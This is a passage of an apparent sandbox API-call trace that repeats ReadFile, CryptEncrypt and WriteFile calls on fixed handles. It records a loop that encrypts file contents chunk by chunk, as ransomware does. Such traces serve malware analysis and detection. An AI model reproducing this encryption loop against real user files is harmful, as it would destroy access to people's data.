lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.127] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.127] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.127] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.127] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.128] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.128] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.128] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.128] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.128] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.129] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.129] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.129] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.129] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.129] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.129] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.129] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.129] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.129] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.129] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.130] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.130] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.130] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.130] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.130] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.131] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.131] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.131] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.131] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.131] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.131] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.131] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.131] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.131] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.131] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.131] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.131] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.132] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.132] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.132] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.132] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.132] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.132] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.133] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.133] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.133] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.133] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.133] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.133] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.133] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.133] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.133] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.133] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.134] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.134] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.134] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.134] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.134] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.134] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.135] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.135] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.135] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.135] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, 